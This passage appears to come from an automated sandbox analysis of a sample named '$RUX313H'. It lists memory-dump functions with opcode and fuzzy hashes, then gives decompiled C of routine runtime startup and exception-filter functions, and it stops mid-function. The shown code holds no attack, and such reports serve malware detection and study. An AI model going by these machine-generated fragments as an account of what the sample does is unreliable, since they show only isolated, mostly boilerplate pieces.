
                                                                          Function 05CA5100, Relevance: .0, Instructions: 31COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.683429465.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_5ca0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9d690ea2dbef97e56c1d8069c84c780d4d4dc5103e859d9c9d06b4f50b16e571
                                                                          • Instruction ID: 7503e95a7ecc08c8f5fa94c0ed03232b23c0b2062ed940a0fdd937b5dac9166a
                                                                          • Opcode Fuzzy Hash: 9d690ea2dbef97e56c1d8069c84c780d4d4dc5103e859d9c9d06b4f50b16e571
                                                                          • Instruction Fuzzy Hash: 52E065313544105FC7049B5EE858E5AB7EAEFCDA25F21806AF209CB361CEA1DC018795
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 03420548, Relevance: .0, Instructions: 31COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 18cf3b10653c8907cc18c9a3eb68e6c59acc7adef5f719fa0358ff2781028a89
                                                                          • Instruction ID: c7ef08d753bb67fe0feb1b5fceda76a2d667af08e04f9f6659ff5970628429da
                                                                          • Opcode Fuzzy Hash: 18cf3b10653c8907cc18c9a3eb68e6c59acc7adef5f719fa0358ff2781028a89
                                                                          • Instruction Fuzzy Hash: D4F0E5B610C3501FC753C639ACA08537FEECB9617034940EBEA84DB203D625D801C365
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05CA4718, Relevance: .0, Instructions: 28COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.683429465.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_5ca0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e3c7a1e2534a1c8dc91159b12137df57b151d46e469692940c5396f8cffc99e4
                                                                          • Instruction ID: 16704970dcd27c7a6f61dada27a3fb18fe2737cccd3a76326895586900fbf89c
                                                                          • Opcode Fuzzy Hash: e3c7a1e2534a1c8dc91159b12137df57b151d46e469692940c5396f8cffc99e4
                                                                          • Instruction Fuzzy Hash: 44E080313045105F4604E75FA89485EB7EEEFCE565351407AF10DDB750DE609C0546E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 03420448, Relevance: .0, Instructions: 27COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 67e0adab1bf9ad31914e0a3fb204d4557f89423ba7d9673beab9940f1109367d
                                                                          • Instruction ID: 1dbd36f835dcc2e262bc82a9b52ec2b95b1c01f735d034f4e7de8ec993edf00a
                                                                          • Opcode Fuzzy Hash: 67e0adab1bf9ad31914e0a3fb204d4557f89423ba7d9673beab9940f1109367d
                                                                          • Instruction Fuzzy Hash: 08E06D317016209F8354EB79A40488BB7E6EF86514391893ED10ADF710DF31E8088BE5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0342FE13, Relevance: .0, Instructions: 27COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 74914bff7a7afb1c429a402569e4062ffc0a424888292ba2a4ab575a7b39eb18
                                                                          • Instruction ID: b5d9b2a95b9c4e3df0752a82019eb7c6198cb14a800dfad4ed4844c4c6549b91
                                                                          • Opcode Fuzzy Hash: 74914bff7a7afb1c429a402569e4062ffc0a424888292ba2a4ab575a7b39eb18
                                                                          • Instruction Fuzzy Hash: 48E0DFBA00C7E11BC723CB69E8243423F78DB93020F8A40DFE094CF683C65C18098361
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 03426520, Relevance: .0, Instructions: 25COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f64e2bed4976fc895f9c6aece74995d8762bde5152ea76092d9ad4cb5074c662
                                                                          • Instruction ID: 7d2634f2fedc235e4955dbcca33128ccce36f54cd39f8bed7dce06dc708dbfea
                                                                          • Opcode Fuzzy Hash: f64e2bed4976fc895f9c6aece74995d8762bde5152ea76092d9ad4cb5074c662
                                                                          • Instruction Fuzzy Hash: 9EE0863A3002004B8B14976AE49496FBBDADBCC2353244539E54EC3750DE74EC0287D1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0342B701, Relevance: .0, Instructions: 24COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 91db6397e6adc4f29f654c2a96ca8ddd1c256c17793e31add6fcca269d18f37d
                                                                          • Instruction ID: f3705f503eea57edaab7705998ccd2afae998ebaf1fe09f1381ffe76c47ac000
                                                                          • Opcode Fuzzy Hash: 91db6397e6adc4f29f654c2a96ca8ddd1c256c17793e31add6fcca269d18f37d
                                                                          • Instruction Fuzzy Hash: AFE092352057014BC7059B65E51956E7BA6AFC4206308C92AE50AC7760DF309D02CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0342B6C0, Relevance: .0, Instructions: 24COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 151b5036fc30193f8fd4e6f32dac0b34efe7303cddab152b87f412b296875335
                                                                          • Instruction ID: 7d79e1d49cde5bb9ff8ee93e40d34355fa90a46c68707a0c26af18e540d1a739
                                                                          • Opcode Fuzzy Hash: 151b5036fc30193f8fd4e6f32dac0b34efe7303cddab152b87f412b296875335
                                                                          • Instruction Fuzzy Hash: A4E0E5352006109B8324DB1AE494C16F7E6EFC9628714C46DE91E87B68CB32FC42CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0342F1A0, Relevance: .0, Instructions: 23COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: aabf15a0018589347227374aa4bc33d0006df65a98cf0e8d59b2a3a52775a06c
                                                                          • Instruction ID: b731eaa0848daaf6bb51d401c7388a844af057fa092ad8b77e64082b6c1bbb43
                                                                          • Opcode Fuzzy Hash: aabf15a0018589347227374aa4bc33d0006df65a98cf0e8d59b2a3a52775a06c
                                                                          • Instruction Fuzzy Hash: 08D02B736001105FC701113AAC28B5ABBADCBC5932F58042BF849C7341DE94B90282E8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0342B710, Relevance: .0, Instructions: 23COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6847ef8f4dec4aba30899eaa31ba2188f59237ccf5b21fd22830000950e80418
                                                                          • Instruction ID: 59a936245eb3b71a5924f9792238ab7b421d8076741a659375abd7b2d4151b9c
                                                                          • Opcode Fuzzy Hash: 6847ef8f4dec4aba30899eaa31ba2188f59237ccf5b21fd22830000950e80418
                                                                          • Instruction Fuzzy Hash: 6BE086353006155BC714A766E41986EBBEAEFC4216304C539E51BC3760DF70AC02C7D4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 03424DBC, Relevance: .0, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1f86feec9250ea8b17277eacb07216226b1000ad039cc598d5a7268a61ed5c00
                                                                          • Instruction ID: 9f1ca22f3246511915623619387ebb7de23dd7236aab797724096340b45dd544
                                                                          • Opcode Fuzzy Hash: 1f86feec9250ea8b17277eacb07216226b1000ad039cc598d5a7268a61ed5c00
                                                                          • Instruction Fuzzy Hash: C8F0F239A01218DFDB10CF90E888E88BB72FF89319F14C196E60A57265C731AD51DF40
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 03423878, Relevance: .0, Instructions: 21COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2df31e6370f5c8052a820a3387860ba474bc8cb084cf16d437b030b7cc54e56a
                                                                          • Instruction ID: 33898eb45547438e546fb67ec696e0a093c19e6cf15f06b1da17554314426ca7
                                                                          • Opcode Fuzzy Hash: 2df31e6370f5c8052a820a3387860ba474bc8cb084cf16d437b030b7cc54e56a
                                                                          • Instruction Fuzzy Hash: 0FE01A71A45209ABC780DFB4D99A69EBBF5EB45204F5045A9D508E3210EE715E048782
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0342BC91, Relevance: .0, Instructions: 18COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3eed0693b18d6add18cad461d81c2f135c516088e8c7a0b48618f66a3f106214
                                                                          • Instruction ID: cf9965ec6da9521cd938133b0ca476fb5afdffdb45a31c3d3867742f7b65ed2e
                                                                          • Opcode Fuzzy Hash: 3eed0693b18d6add18cad461d81c2f135c516088e8c7a0b48618f66a3f106214
                                                                          • Instruction Fuzzy Hash: C6D0A7357106208FC3045155E40179677E9E7C8529B48042AE409C6302CDAB9C018BC4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05CA4AC3, Relevance: .0, Instructions: 17COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.683429465.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_5ca0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fb8a9ff7495827c45080368705f98b94cb81b4a00a43fd2f2fd133954c7273f1
                                                                          • Instruction ID: 7effcf0cd83edaf81fa5e9e2b84ed6c9000fc6c137548b882b51ef04e6f1c50f
                                                                          • Opcode Fuzzy Hash: fb8a9ff7495827c45080368705f98b94cb81b4a00a43fd2f2fd133954c7273f1
                                                                          • Instruction Fuzzy Hash: 99E0EC3B1011149FC7419BA0D505B99BFA5AB08651B49446AE6049E634DA328955DB80
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05CA4AD0, Relevance: .0, Instructions: 17COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.683429465.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_5ca0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f999a3ae29fe517437d2a341ac74dd1d756b283be5ab532b271e681dccffd7ca
                                                                          • Instruction ID: 9cc9e60aafbebe923ba6711c3167fde9e8813eb6487a70b2c7a14c47c46d97e8
                                                                          • Opcode Fuzzy Hash: f999a3ae29fe517437d2a341ac74dd1d756b283be5ab532b271e681dccffd7ca
                                                                          • Instruction Fuzzy Hash: B5D05B37100214EF87026BA1D404D99BFE5BF09250345407AF6044F230DF32C851DBC4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 034264AF, Relevance: .0, Instructions: 17COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 36c55e84d053a8be0fd061a4b9bdd87d851931f381373cc5b55b12c16d83c2c9
                                                                          • Instruction ID: 2ab92c2219bc608152f966f6e79b78e915e300794647d217c6a6d78807e0a373
                                                                          • Opcode Fuzzy Hash: 36c55e84d053a8be0fd061a4b9bdd87d851931f381373cc5b55b12c16d83c2c9
                                                                          • Instruction Fuzzy Hash: E6D02B727086A04FD300D7ACD0405413BD29B96124B0B09E4C445EF353D794CC424B65
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 03423888, Relevance: .0, Instructions: 16COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 92bdbdd01649f9d5c97bbc3942bd5af527e73760c5311355719faf4d50fb4dd9
                                                                          • Instruction ID: 100ceb3b17c1e408cacff0d57b50af90088fcaa5a500d6c8312e989d476c9037
                                                                          • Opcode Fuzzy Hash: 92bdbdd01649f9d5c97bbc3942bd5af527e73760c5311355719faf4d50fb4dd9
                                                                          • Instruction Fuzzy Hash: C8D01270A41109EF8740DFB8D99955EB7F5EB442047504599D408E3200EF311F009B81
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05CA1318, Relevance: .0, Instructions: 14COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.683429465.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_5ca0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5c3465a7a4ec3201437e1e1c936eb8593a53d5ef9815daa3c0f8e353d8d8f56a
                                                                          • Instruction ID: 7ebd655958363044395152ff7f817b2c2e6bf11081c61799fceca8caca4f1689
                                                                          • Opcode Fuzzy Hash: 5c3465a7a4ec3201437e1e1c936eb8593a53d5ef9815daa3c0f8e353d8d8f56a
                                                                          • Instruction Fuzzy Hash: 32D0A77130868047C214CB2C9944255FF91AB95214B28CA5FC05587791CB318C03C795
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0342BCA0, Relevance: .0, Instructions: 13COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6309012fb32a8882c9cb04d738a512ea9d2082bd94fbc7b66ceff5f3e0d8ff8b
                                                                          • Instruction ID: 139aecf55828e6a200cc5dee82dcda948de7ba6fe7a6323250e2b3efea2104b7
                                                                          • Opcode Fuzzy Hash: 6309012fb32a8882c9cb04d738a512ea9d2082bd94fbc7b66ceff5f3e0d8ff8b
                                                                          • Instruction Fuzzy Hash: 67C080353107348B83156665A41045677DDEBCD525340047FE40947701CE779C02C7C4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 03425921, Relevance: .0, Instructions: 12COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5ea3fb380d6aa5b5758968c139e65563763a2d27e9e539336f6e2caeb449482f
                                                                          • Instruction ID: 14833138be13b034f60fc7b66c7f5e763cac4b2339879dbcd9fb058952ac1ad3
                                                                          • Opcode Fuzzy Hash: 5ea3fb380d6aa5b5758968c139e65563763a2d27e9e539336f6e2caeb449482f
                                                                          • Instruction Fuzzy Hash: 61D0A934401220CFCF20CF5AE2EA748FBA0FB09720F248484E0048B302D7B08446CF40
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 03425978, Relevance: .0, Instructions: 11COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6c2f0b745bc034702db5882eeb3f79858ae765368ba11fcbc6a32979144accbf
                                                                          • Instruction ID: 97f44cf38d08819c72e3446e995f81a3bff3d34a8e66b1acab89f8df5dacfd9d
                                                                          • Opcode Fuzzy Hash: 6c2f0b745bc034702db5882eeb3f79858ae765368ba11fcbc6a32979144accbf
                                                                          • Instruction Fuzzy Hash: 9ED01235402120CBDF30DF55E1F674D3B64F301730F504550F01083215D7708A46CB56
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0342E6FE, Relevance: .0, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9f6984b6a84dbda9760aa5e0e1deff5d00f1de226f05d5762276d67afff20ee7
                                                                          • Instruction ID: 26ddcd3a68a3f1e08e0c8dc0821e6de1265f872d1cf77f57c39cfdb24c7d26c6
                                                                          • Opcode Fuzzy Hash: 9f6984b6a84dbda9760aa5e0e1deff5d00f1de226f05d5762276d67afff20ee7
                                                                          • Instruction Fuzzy Hash: CEC04C3AA140098B8F00DAC5F4554DDF771FB84229B144162D5155350186312A178B80
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Non-executed Functions

                                                                          Function 00DF297C, Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00DF297C(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}



                                                                          0x00df2981
                                                                          0x00df2991

                                                                          APIs
                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00DF3AF2,?,?,?,00000000), ref: 00DF2981
                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 00DF298A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.673570291.0000000000DF1000.00000020.00020000.sdmp, Offset: 00DF0000, based on PE: true
                                                                          • Associated: 00000001.00000002.673560727.0000000000DF0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673582241.0000000000DF9000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673590127.0000000000DFF000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673598627.0000000000E02000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.674045207.000000000115B000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.674055558.0000000001162000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_df0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled
                                                                          • String ID:
                                                                          • API String ID: 3192549508-0
                                                                          • Opcode ID: 5b20e79d1a927e48ccf117fc0330391a185a2dbfaf5f0153d9a719a32ce762bf
                                                                          • Instruction ID: 9cbd6caa4818d8813f00091b1a8dbd068b989d57c79018f53bc1486fdcccaeab
                                                                          • Opcode Fuzzy Hash: 5b20e79d1a927e48ccf117fc0330391a185a2dbfaf5f0153d9a719a32ce762bf
                                                                          • Instruction Fuzzy Hash: 77B09231444308ABCB002F91EC19B68BF39FB04652F088010F60DC4274CF625410CEAA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00DF2959, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00DF2959(_Unknown_base(*)()* _a4) {

				return SetUnhandledExceptionFilter(_a4);
			}



                                                                          0x00df2966

                                                                          APIs
                                                                          • SetUnhandledExceptionFilter.KERNEL32(?,?,00DF154D,00DF1502), ref: 00DF295F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.673570291.0000000000DF1000.00000020.00020000.sdmp, Offset: 00DF0000, based on PE: true
                                                                          • Associated: 00000001.00000002.673560727.0000000000DF0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673582241.0000000000DF9000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673590127.0000000000DFF000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673598627.0000000000E02000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.674045207.000000000115B000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.674055558.0000000001162000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_df0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled
                                                                          • String ID:
                                                                          • API String ID: 3192549508-0
                                                                          • Opcode ID: ff75f31c867011ec2d082eeabef7a7e91713ff692949dabf7cc76aea2570f47c
                                                                          • Instruction ID: b070fe18aae53bbf3c28c5c903c073981c363e8e66b3af61ef17324c4bbd7cd2
                                                                          • Opcode Fuzzy Hash: ff75f31c867011ec2d082eeabef7a7e91713ff692949dabf7cc76aea2570f47c
                                                                          • Instruction Fuzzy Hash: 70A0123000020CA78B001F41EC045547F2DE6001507004010F40C80120CB225410C995
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00DF1EBA, Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00DF1EBA() {
				void* _t3;

				_t3 = GetProcessHeap();
				 *0xe00790 = _t3;
				return 0 | _t3 != 0x00000000;
			}




                                                                          0x00df1eba
                                                                          0x00df1ec7
                                                                          0x00df1ece

                                                                          APIs
                                                                          • GetProcessHeap.KERNEL32(00DF12BE,00DFD6E0,00000014), ref: 00DF1EBA
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.673570291.0000000000DF1000.00000020.00020000.sdmp, Offset: 00DF0000, based on PE: true
                                                                          • Associated: 00000001.00000002.673560727.0000000000DF0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673582241.0000000000DF9000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673590127.0000000000DFF000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673598627.0000000000E02000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.674045207.000000000115B000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.674055558.0000000001162000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_df0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID: HeapProcess
                                                                          • String ID:
                                                                          • API String ID: 54951025-0
                                                                          • Opcode ID: 40809a5312175c9f0239278c276055130e51559634ad8bf1157bdb2ce9ff67e0
                                                                          • Instruction ID: ba943b6465401ac585d1be575a1d51779f5ba32aba19679f88f1ac23ca29d783
                                                                          • Opcode Fuzzy Hash: 40809a5312175c9f0239278c276055130e51559634ad8bf1157bdb2ce9ff67e0
                                                                          • Instruction Fuzzy Hash: 02B012B07012028FCB084F39BC2531977D4A70C111704803E7007C1760DF308450DF10
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00DF1ECF, Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 84%
                                                                          			E00DF1ECF(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t80;
				signed int _t84;
				long _t88;
				signed int _t92;
				signed int _t96;
				signed int _t97;
				signed char _t101;
				signed int _t103;
				intOrPtr _t104;
				intOrPtr* _t107;
				signed char _t109;
				long _t117;
				signed int _t126;
				signed int _t130;
				signed int _t131;
				signed int _t134;
				void** _t135;
				signed int _t137;
				void* _t138;
				signed int _t139;
				void** _t143;
				signed int _t145;
				void* _t146;
				signed int _t150;
				void* _t151;

				_push(0x64);
				_push(0xdfd770);
				E00DF2A00(__ebx, __edi, __esi);
				E00DF2C8D(0xb);
				_t126 = 0;
				 *(_t151 - 4) = 0;
				_push(0x40);
				_t137 = 0x20;
				_push(_t137);
				_t80 = E00DF2E3E();
				_t130 = _t80;
				 *(_t151 - 0x24) = _t130;
				if(_t130 != 0) {
					 *0xe00798 = _t80;
					 *0xe01c74 = _t137;
					while(1) {
						__eflags = _t130 - _t80 + 0x800;
						if(_t130 >= _t80 + 0x800) {
							break;
						}
						 *((short*)(_t130 + 4)) = 0xa00;
						 *_t130 =  *_t130 | 0xffffffff;
						 *(_t130 + 8) = _t126;
						 *(_t130 + 0x24) =  *(_t130 + 0x24) & 0x00000080;
						 *(_t130 + 0x24) =  *(_t130 + 0x24) & 0x0000007f;
						 *((short*)(_t130 + 0x25)) = 0xa0a;
						 *(_t130 + 0x38) = _t126;
						 *(_t130 + 0x34) = _t126;
						_t130 = _t130 + 0x40;
						 *(_t151 - 0x24) = _t130;
						_t80 =  *0xe00798; // 0x17da618
					}
					GetStartupInfoW(_t151 - 0x74);
					__eflags =  *((short*)(_t151 - 0x42));
					if( *((short*)(_t151 - 0x42)) == 0) {
